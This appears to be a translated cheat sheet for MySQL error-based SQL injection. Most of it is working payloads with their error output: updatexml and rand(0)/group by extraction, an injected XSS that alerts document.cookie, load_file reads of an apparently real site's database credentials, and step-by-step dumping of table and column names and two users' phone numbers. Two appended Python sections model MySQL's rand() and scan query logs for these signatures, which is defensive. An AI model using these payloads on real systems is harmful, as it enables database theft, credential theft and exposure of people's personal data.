MySQL error-based injection

How does an error message turn into XSS?

MySQL statements that raise errors on the page leak information
=========================================================================================================================================================================
*	Error method "updatexml": the output length is limited, but no union is needed.
	-	mysql> select updatexml(1, concat(':', 'test'), 1);
			ERROR 1105 (HY000): XPATH syntax error: ':test'
	-	mysql> select updatexml(1, concat(0x3a, 'test'), 1);
			ERROR 1105 (HY000): XPATH syntax error: ':test'
	-	mysql> select updatexml(1, concat(0x5e, 'test'), 1);
			ERROR 1105 (HY000): XPATH syntax error: '^test'
	-	mysql>  select * from f_user where id=1 or 1=updatexml(1,concat(0x5e, 'test'),1);
			ERROR 1105 (HY000): XPATH syntax error: '^test'
	**	Replace 'test' above with your subquery or function.

*	group by + rand(0) + having: no length limit, no union needed.
	-	mysql>  select * from f_user where id=1 or 1 group by concat_ws(0x7e,version(),floor(rand(0)*2)) having min(0);
			ERROR 1062 (23000): Duplicate entry '5.6.21-log~1' for key 'group_key'

*	Error method "rand + count + group by": needs to be combined with union.
	rand(0) generates the same sequence no matter which machine it runs on or how many times it is run.
	See the bug reported in the MySQL developer community: http://bugs.mysql.com/bug.php?id=8652
	-	mysql>  select 1,2,count(*),concat('test', char(0x5e), floor(rand(0)*2))x from information_schema.tables group by x;
			ERROR 1062 (23000): Duplicate entry 'test^1' for key 'group_key'
	-	mysql>  select 1,2,count(*),concat('test', char(0x5e), left(rand(0),3))x from information_schema.tables group by x;
			ERROR 1062 (23000): Duplicate entry 'test^0.7' for key 'group_key'
	**	Replace 'test' above with your subquery or function.
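To see why the duplicate-entry error above is deterministic, here is an added Python model (not code from the original post) of MySQL's rand(seed) generator and of how GROUP BY evaluates a non-deterministic key once when probing the temporary table and again when inserting a new group. The generator constants follow my reading of MySQL's my_rnd() and the two-evaluation model is a simplification; both are assumptions, and the model reproduces the 'test^1' and 'test^0.7' keys shown above.

```python
import math

MAX_VALUE = 0x3FFFFFFF  # modulus of MySQL's my_rnd() LCG (assumption from the server source)


class MySQLRand:
    """Model of MySQL RAND(seed): a small LCG seeded from the integer argument.
    RAND(0) always starts from seed1=55555555, seed2=0, so the stream is
    identical on every server, which is what makes the trick repeatable."""

    def __init__(self, seed=0):
        self.seed1 = (seed * 0x10001 + 55555555) & MAX_VALUE
        self.seed2 = (seed * 0x10000001) & MAX_VALUE

    def next(self):
        self.seed1 = (self.seed1 * 3 + self.seed2) % MAX_VALUE
        self.seed2 = (self.seed1 + self.seed2 + 33) % MAX_VALUE
        return self.seed1 / MAX_VALUE


class DuplicateEntry(Exception):
    """Stands in for ERROR 1062: Duplicate entry '...' for key 'group_key'."""


def simulate_group_by(key_of, rows, seed=0):
    """Simplified GROUP BY over a key that calls RAND(): the key is computed to
    probe the temp table, and computed AGAIN when a new group is inserted, so
    the inserted value may already exist. Returns group counts if no error."""
    rnd = MySQLRand(seed)
    groups = {}
    for _ in range(rows):
        probe = key_of(rnd.next())
        if probe in groups:
            groups[probe] += 1
            continue
        inserted = key_of(rnd.next())  # second evaluation on insert
        if inserted in groups:
            raise DuplicateEntry(inserted)
        groups[inserted] = 1
    return groups


def floor_rand_times_2(r):
    return str(math.floor(r * 2))  # floor(rand(0)*2) -> 0 1 1 0 1 1 0 0 1 1 ...


def left_rand_3(r):
    return str(r)[:3]  # left(rand(0),3) -> 0.1 0.6 0.6 0.3 0.7 0.7 0.2 0.3 0.9 0.7 ...


def first_duplicate_row(key_of, max_rows=100):
    """Smallest row count at which the query fails, with the duplicated key."""
    for n in range(1, max_rows + 1):
        try:
            simulate_group_by(key_of, n)
        except DuplicateEntry as e:
            return n, e.args[0]
    return None
```

The model shows that the floor(rand(0)*2) form needs only three rows in the source table to fail, while left(rand(0),3) needs six, which is why these queries are run against a table guaranteed to be large enough.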

MySQL to XSS statement
	mysql>  select 1,2,count(*),concat((select 0x2F3E3C696D67207372633D226675636B22206F6E6572726F723D616C65727428646F63756D656E742E636F6F6B6965293E), char(0x5e), left(rand(0),3))x from information_schema.tables group by x;
		ERROR 1062 (23000): Duplicate entry '/><img src="fuck" onerror=alert(document.cookie)>^0.7' for key 'group_key'

Dump the configuration file password directly, provided the account has the FILE privilege
	mysql>	select 1,2,3,updatexml(1,concat(char(58),substr(load_file(0x2F616C69646174612F7777772F66616E676A69616E676A756E2F4170706C69636174696F6E2F436F6D6D6F6E2F436F6E662F64622E706870),150,40) ),1);
		ERROR 1105 (HY000): XPATH syntax error: ':	'DB_NAME'   => 'fan******un','
	mysql>  select 1,2,3,updatexml(1,concat(char(58),substr(load_file(0x2F616C69646174612F7777772F66616E676A69616E676A756E2F4170706C69636174696F6E2F436F6D6D6F6E2F436F6E662F64622E706870),200,40) ),1);
		ERROR 1105 (HY000): XPATH syntax error: ':	'DB_USER'   => 's*********b', /'
	mysql>  select 1,2,3,updatexml(1,concat(char(58),substr(load_file(0x2F616C69646174612F7777772F66616E676A69616E676A756E2F4170706C69636174696F6E2F436F6D6D6F6E2F436F6E662F64622E706870),250,40) ),1);
		ERROR 1105 (HY000): XPATH syntax error: ':PWD'    => 'hahahaahhah','

Dump the version
	mysql> select 1,2,3,4 union select distinct concat((select version()),floor(rand(0)*2))a, count(*),3,4 from information_schema.tables group by a;
		ERROR 1062 (23000): Duplicate entry '5.6.21-log1' for key 'group_key'

Dump the database name
	mysql> select info();
		ERROR 1305 (42000): FUNCTION fangjiangjun.info does not exist
	mysql> select count(*), ( concat( (select database()), char(0x5e), floor(rand(0)*2) ) )x from information_schema.tables group by x;
		ERROR 1062 (23000): Duplicate entry 'fangjiangjun^1' for key 'group_key'

Dump table names
	mysql> select concat( (select distinct table_name from information_schema.tables limit 0,1), char(0x5e), floor(rand(0)*2) )x, count(*) from information_schema.tables group by x;
		ERROR 1062 (23000): Duplicate entry 'CHARACTER_SETS^1' for key 'group_key'
	mysql> select concat( (select distinct table_name from information_schema.tables limit 1,1), char(0x5e), floor(rand(0)*2) )x, count(*) from information_schema.tables group by x;
		ERROR 1062 (23000): Duplicate entry 'COLLATIONS^1' for key 'group_key'
	mysql> select concat( (select distinct table_name from information_schema.tables limit 2,1), char(0x5e), floor(rand(0)*2) )x, count(*) from information_schema.tables group by x;
		ERROR 1062 (23000): Duplicate entry 'COLLATION_CHARACTER_SET_APPLICABILITY^1' for key 'group_key'

	mysql> select concat( (select distinct table_name from information_schema.tables where table_schema='fangjiangjun' limit 0,1), char(0x5e), floor(rand(0)*2) )x, count(*) from information_schema.tables group by x;
		ERROR 1062 (23000): Duplicate entry 'f_admin^1' for key 'group_key'
	mysql> select concat( (select distinct table_name from information_schema.tables where table_schema='fangjiangjun' limit 1,1), char(0x5e), floor(rand(0)*2) )x, count(*) from information_schema.tables group by x;
		ERROR 1062 (23000): Duplicate entry 'f_admin_role^1' for key 'group_key'

Dump column names
	mysql>  select concat( (select distinct column_name from information_schema.columns where table_schema='fangjiangjun' and table_name='f_user' limit 0,1), char(0x5e), floor(rand(0)*2) )x, count(*) from information_schema.tables group by x;
		ERROR 1062 (23000): Duplicate entry 'id^1' for key 'group_key'
	mysql>  select concat( (select distinct column_name from information_schema.columns where table_schema='fangjiangjun' and table_name='f_user' limit 1,1), char(0x5e), floor(rand(0)*2) )x, count(*) from information_schema.tables group by x;
		ERROR 1062 (23000): Duplicate entry 'login_time^1' for key 'group_key'

Dump column values
	mysql>  select concat( (select mobile_phone from fangjiangjun.f_user order by id limit 0,1), char(0x5e), floor(rand(0)*2) )x, count(*) from information_schema.tables group by x;
		ERROR 1062 (23000): Duplicate entry '18602029479^1' for key 'group_key'
	mysql>  select concat( (select mobile_phone from fangjiangjun.f_user order by id limit 1,1), char(0x5e), floor(rand(0)*2) )x, count(*) from information_schema.tables group by x;
		ERROR 1062 (23000): Duplicate entry '15602267509^1' for key 'group_key'
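Every query in the enumeration sequence above leaves a recognisable trace in the MySQL general log. The following Python scanner is an added example (not part of the original post) that tags such statements by the signatures this page demonstrates; the log lines are constructed samples in the general-log layout, and the signature list is a triage aid for the DBA or responder, not a substitute for parameterized queries and for never rendering database exceptions into the HTML response.

```python
import re

# Signatures of the techniques shown on this page: XML functions whose error
# echoes their argument, the rand(0)/GROUP BY duplicate-key trick, the
# GROUP BY ... HAVING variant, schema enumeration and FILE-privilege reads.
SIGNATURES = {
    "xpath_error_function": re.compile(r"\b(updatexml|extractvalue)\s*\(", re.I),
    "rand_groupby_dupkey": re.compile(r"floor\s*\(\s*rand\s*\(\s*0?\s*\)\s*\*\s*2\s*\)", re.I),
    "groupby_having_rand": re.compile(r"group\s+by\b.*\brand\s*\(.*\bhaving\b", re.I | re.S),
    "schema_enumeration": re.compile(r"information_schema\.(tables|columns)", re.I),
    "file_read": re.compile(r"\bload_file\s*\(", re.I),
}

# General-log line layout: "<timestamp>\t<thread id> <command>\t<argument>".
LOG_LINE = re.compile(r"^(?P<ts>\S+)\s+(?P<thread>\d+)\s+Query\s+(?P<sql>.*)$")

# Constructed sample log; the queries are the ones discussed on this page and
# the file path is a placeholder, not a real configuration file.
SAMPLE_GENERAL_LOG = """\
2024-10-12T19:22:54.000001Z\t   12 Connect\tapp@localhost on shop
2024-10-12T19:22:54.100001Z\t   12 Query\tselect * from f_user where id=1
2024-10-12T19:22:55.200001Z\t   12 Query\tselect * from f_user where id=1 or 1=updatexml(1,concat(0x5e,version()),1)
2024-10-12T19:22:56.300001Z\t   12 Query\tselect count(*),concat((select database()),char(0x5e),floor(rand(0)*2))x from information_schema.tables group by x
2024-10-12T19:22:57.400001Z\t   12 Query\tselect * from f_user where id=1 or 1 group by concat_ws(0x7e,version(),floor(rand(0)*2)) having min(0)
2024-10-12T19:22:58.500001Z\t   12 Query\tselect updatexml(1,concat(char(58),substr(load_file('/path/to/config.php'),1,40)),1)
2024-10-12T19:22:59.600001Z\t   12 Quit\t
"""


def classify(sql):
    """Names of every signature that matches one SQL statement (may be empty)."""
    return [name for name, rx in SIGNATURES.items() if rx.search(sql)]


def scan_general_log(text):
    """Return one record per Query line that matches at least one signature.
    Case-insensitive, but comment/whitespace obfuscation is not normalised,
    so treat a hit as a lead for review rather than proof of an attack."""
    hits = []
    for line in text.splitlines():
        m = LOG_LINE.match(line)
        if not m:
            continue  # Connect, Quit and other non-query records
        tags = classify(m.group("sql"))
        if tags:
            hits.append({"ts": m.group("ts"), "thread": int(m.group("thread")),
                         "sql": m.group("sql"), "tags": tags})
    return hits


if __name__ == "__main__":
    for h in scan_general_log(SAMPLE_GENERAL_LOG):
        print(h["ts"], h["thread"], ",".join(h["tags"]), "|", h["sql"][:60])
```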

Date: 2024-10-12 19:22:54
